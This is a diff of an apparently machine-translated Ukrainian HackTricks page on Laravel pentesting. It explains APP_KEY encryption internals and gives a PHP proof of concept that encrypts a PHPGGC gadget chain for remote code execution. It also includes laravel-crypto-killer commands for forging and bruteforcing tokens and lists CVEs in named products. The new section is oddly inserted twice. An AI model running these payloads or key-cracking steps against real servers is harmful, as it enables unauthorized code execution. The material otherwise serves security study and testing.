Translated ['src/network-services-pentesting/pentesting-web/laravel.md']

src/network-services-pentesting/pentesting-web/laravel.md

@@ -1,13 +1,99 @@
 # Laravel
 
+{{#include /banners/hacktricks-training.md}}
+
+### Laravel SQLInjection
+
+Прочитайте інформацію про це тут: [https://stitcher.io/blog/unsafe-sql-functions-in-laravel](https://stitcher.io/blog/unsafe-sql-functions-in-laravel)
+
+---
+
+## APP_KEY & Encryption internals (Laravel \u003e=5.6)
+
+Laravel використовує AES-256-CBC (або GCM) з HMAC цілісності під капотом (`Illuminate\\Encryption\\Encrypter`).
+Сирий шифротекст, який врешті-решт **надсилається клієнту**, є **Base64 JSON об'єктом** на зразок:
+```json
+{
+"iv"   : "Base64(random 16-byte IV)",
+"value": "Base64(ciphertext)",
+"mac"  : "HMAC_SHA256(iv||value, APP_KEY)",
+"tag"  : ""                 // only used for AEAD ciphers (GCM)
+}
+```
+`encrypt($value, $serialize=true)` за замовчуванням `serialize()` відкритий текст, тоді як
+`decrypt($payload, $unserialize=true)` **автоматично `unserialize()`** розшифроване значення.
+Отже, **будь-який зловмисник, який знає 32-байтовий секрет `APP_KEY`, може створити зашифрований PHP серіалізований об'єкт і отримати RCE через магічні методи (`__wakeup`, `__destruct`, …)**.
+
+Мінімальний PoC (фреймворк ≥9.x):
+```php
+use Illuminate\Support\Facades\Crypt;
+
+$chain = base64_decode('<phpggc-payload>'); // e.g. phpggc Laravel/RCE13 system id -b -f
+$evil  = Crypt::encrypt($chain);            // JSON->Base64 cipher ready to paste
+```
+Впровадьте отриманий рядок у будь-який вразливий `decrypt()` sink (параметр маршруту, cookie, сесія тощо).
+
+---
+
+## laravel-crypto-killer 🧨
+[laravel-crypto-killer](https://github.com/synacktiv/laravel-crypto-killer) автоматизує весь процес і додає зручний **bruteforce** режим:
+```bash
+# Encrypt a phpggc chain with a known APP_KEY
+laravel_crypto_killer.py encrypt -k "base64:<APP_KEY>" -v "$(phpggc Laravel/RCE13 system id -b -f)"
+
+# Decrypt a captured cookie / token
+laravel_crypto_killer.py decrypt -k <APP_KEY> -v <cipher>
+
+# Try a word-list of keys against a token (offline)
+laravel_crypto_killer.py bruteforce -v <cipher> -kf appkeys.txt
+```
+Скрипт прозоро підтримує як CBC, так і GCM корисні навантаження та повторно генерує поле HMAC/tag.
+
+---
+
+## Вразливі патерни в реальному світі
+
+| Проект | Вразливий sink | Ланцюг гаджетів |
+|--------|----------------|------------------|
+| Invoice Ninja ≤v5 (CVE-2024-55555) | `/route/{hash}` → `decrypt($hash)` | Laravel/RCE13 |
+| Snipe-IT ≤v6 (CVE-2024-48987) | cookie `XSRF-TOKEN`, коли активовано `Passport::withCookieSerialization()` | Laravel/RCE9 |
+| Crater (CVE-2024-55556) | `SESSION_DRIVER=cookie` → cookie `laravel_session` | Laravel/RCE15 |
+
+Процес експлуатації завжди такий:
+1. Отримати `APP_KEY` (за замовчуванням, витік Git, витік config/.env або брутфорс)
+2. Згенерувати гаджет за допомогою **PHPGGC**
+3. `laravel_crypto_killer.py encrypt …`
+4. Доставити корисне навантаження через вразливий параметр/cookie → **RCE**
+
+---
+
+## Масове виявлення APP_KEY через брутфорс cookie
+
+Оскільки кожен новий відповідь Laravel встановлює принаймні 1 зашифрований cookie (`XSRF-TOKEN` і зазвичай `laravel_session`), **публічні інтернет-сканери (Shodan, Censys, …) витікають мільйони шифротекстів**, які можна атакувати офлайн.
+
+Ключові висновки дослідження, опублікованого Synacktiv (2024-2025):
+* Набір даних липень 2024 » 580 тис. токенів, **3.99 % ключів зламано** (≈23 тис.)
+* Набір даних травень 2025 » 625 тис. токенів, **3.56 % ключів зламано**
+* >1 000 серверів все ще вразливі до старого CVE-2018-15133, оскільки токени безпосередньо містять серіалізовані дані.
+* Велике повторне використання ключів – Топ-10 APP_KEYs є жорстко закодованими значеннями за замовчуванням, які постачаються з комерційними шаблонами Laravel (UltimatePOS, Invoice Ninja, XPanel, …).
+
+Приватний інструмент Go **nounours** підвищує пропускну здатність брутфорсу AES-CBC/GCM до ~1.5 мільярда спроб/с, зменшуючи час зламу повного набору даних до <2 хвилин.
+
+---
+
+## Посилання
+* [Laravel: аналіз витоку APP_KEY](https://www.synacktiv.com/publications/laravel-appkey-leakage-analysis.html)
+* [laravel-crypto-killer](https://github.com/synacktiv/laravel-crypto-killer)
+* [PHPGGC – PHP Generic Gadget Chains](https://github.com/ambionics/phpggc)
+* [CVE-2018-15133 опис (WithSecure)](https://labs.withsecure.com/archive/laravel-cookie-forgery-decryption-and-rce)
+
 {{#include ../../banners/hacktricks-training.md}}
 
-
-## ЛарAVEL Трюки
+## Ларевел Трюки
 
 ### Режим налагодження
 
-Якщо Laravel знаходиться в **режимі налагодження**, ви зможете отримати доступ до **коду** та **чутливих даних**.\
+Якщо Laravel у **режимі налагодження**, ви зможете отримати доступ до **коду** та **чутливих даних**.\
 Наприклад `http://127.0.0.1:8000/profiles`:
 
 ![](<../../images/image (1046).png>)
@@ -16,7 +102,7 @@
 
 ### .env
 
-Laravel зберігає APP, який використовує для шифрування cookie та інших облікових даних, у файлі під назвою `.env`, до якого можна отримати доступ за допомогою деякого обходу шляху: `/../.env`
+Laravel зберігає APP, який він використовує для шифрування cookie та інших облікових даних, у файлі під назвою `.env`, до якого можна отримати доступ за допомогою деякого обходу шляху: `/../.env`
 
 Laravel також покаже цю інформацію на сторінці налагодження (яка з'являється, коли Laravel знаходить помилку і вона активована).
 
@@ -99,4 +185,87 @@ encrypt(b'{"data":"a:6:{s:6:\\"_token\\";s:40:\\"RYB6adMfWWTSNXaDfEw74ADcfMGIFC2
 Прочитайте інформацію про це тут: [https://stitcher.io/blog/unsafe-sql-functions-in-laravel](https://stitcher.io/blog/unsafe-sql-functions-in-laravel)
 
 
+### Laravel SQLInjection
+
+Прочитайте інформацію про це тут: [https://stitcher.io/blog/unsafe-sql-functions-in-laravel](https://stitcher.io/blog/unsafe-sql-functions-in-laravel)
+
+---
+
+## APP_KEY & Encryption internals (Laravel \u003e=5.6)
+
+Laravel використовує AES-256-CBC (або GCM) з HMAC цілісності під капотом (`Illuminate\\Encryption\\Encrypter`).
+Сирцевий шифротекст, який врешті-решт **надсилається клієнту**, є **Base64 JSON об'єкта** як:
+```json
+{
+"iv"   : "Base64(random 16-byte IV)",
+"value": "Base64(ciphertext)",
+"mac"  : "HMAC_SHA256(iv||value, APP_KEY)",
+"tag"  : ""                 // only used for AEAD ciphers (GCM)
+}
+```
+`encrypt($value, $serialize=true)` за замовчуванням `serialize()` відкритий текст, тоді як `decrypt($payload, $unserialize=true)` **автоматично `unserialize()`** розшифроване значення. Тому **будь-який зловмисник, який знає 32-байтовий секрет `APP_KEY`, може створити зашифрований PHP серіалізований об'єкт і отримати RCE через магічні методи (`__wakeup`, `__destruct`, …)**.
+
+Мінімальний PoC (framework ≥9.x):
+```php
+use Illuminate\Support\Facades\Crypt;
+
+$chain = base64_decode('<phpggc-payload>'); // e.g. phpggc Laravel/RCE13 system id -b -f
+$evil  = Crypt::encrypt($chain);            // JSON->Base64 cipher ready to paste
+```
+Впровадьте отриманий рядок у будь-який вразливий `decrypt()` sink (параметр маршруту, cookie, сесія тощо).
+
+---
+
+## laravel-crypto-killer 🧨
+[laravel-crypto-killer](https://github.com/synacktiv/laravel-crypto-killer) автоматизує весь процес і додає зручний **bruteforce** режим:
+```bash
+# Encrypt a phpggc chain with a known APP_KEY
+laravel_crypto_killer.py encrypt -k "base64:<APP_KEY>" -v "$(phpggc Laravel/RCE13 system id -b -f)"
+
+# Decrypt a captured cookie / token
+laravel_crypto_killer.py decrypt -k <APP_KEY> -v <cipher>
+
+# Try a word-list of keys against a token (offline)
+laravel_crypto_killer.py bruteforce -v <cipher> -kf appkeys.txt
+```
+Скрипт прозоро підтримує як CBC, так і GCM корисні навантаження та повторно генерує поле HMAC/tag.
+
+---
+
+## Вразливі патерни в реальному світі
+
+| Проект | Вразливий sink | Ланцюг гаджетів |
+|---------|-----------------|--------------|
+| Invoice Ninja ≤v5 (CVE-2024-55555) | `/route/{hash}` → `decrypt($hash)` | Laravel/RCE13 |
+| Snipe-IT ≤v6 (CVE-2024-48987) | cookie `XSRF-TOKEN`, коли увімкнено `Passport::withCookieSerialization()` | Laravel/RCE9 |
+| Crater  (CVE-2024-55556) | `SESSION_DRIVER=cookie` → cookie `laravel_session` | Laravel/RCE15 |
+
+Процес експлуатації завжди:
+1. Отримати `APP_KEY` (приклади за замовчуванням, витік з Git, витік config/.env або брутфорс)
+2. Згенерувати гаджет за допомогою **PHPGGC**
+3. `laravel_crypto_killer.py encrypt …`
+4. Доставити корисне навантаження через вразливий параметр/cookie → **RCE**
+
+---
+
+## Масове виявлення APP_KEY через брутфорс cookie
+
+Оскільки кожна нова відповідь Laravel встановлює принаймні 1 зашифрований cookie (`XSRF-TOKEN` і зазвичай `laravel_session`), **публічні інтернет-сканери (Shodan, Censys, …) витікають мільйони шифротекстів**, які можна атакувати офлайн.
+
+Ключові висновки дослідження, опублікованого Synacktiv (2024-2025):
+* Набір даних липень 2024 » 580 тис. токенів, **3.99 % ключів зламано** (≈23 тис.)
+* Набір даних травень 2025 » 625 тис. токенів, **3.56 % ключів зламано**
+* >1 000 серверів все ще вразливі до старого CVE-2018-15133, оскільки токени безпосередньо містять серіалізовані дані.
+* Велике повторне використання ключів – Топ-10 APP_KEYs є жорстко закодованими значеннями за замовчуванням, які постачаються з комерційними шаблонами Laravel (UltimatePOS, Invoice Ninja, XPanel, …).
+
+Приватний інструмент Go **nounours** підвищує пропускну здатність брутфорсу AES-CBC/GCM до ~1.5 мільярда спроб/с, зменшуючи час зламу повного набору даних до <2 хвилин.
+
+---
+
+## Посилання
+* [Laravel: аналіз витоку APP_KEY](https://www.synacktiv.com/publications/laravel-appkey-leakage-analysis.html)
+* [laravel-crypto-killer](https://github.com/synacktiv/laravel-crypto-killer)
+* [PHPGGC – PHP Generic Gadget Chains](https://github.com/ambionics/phpggc)
+* [CVE-2018-15133 опис (WithSecure)](https://labs.withsecure.com/archive/laravel-cookie-forgery-decryption-and-rce)
+
 {{#include ../../banners/hacktricks-training.md}}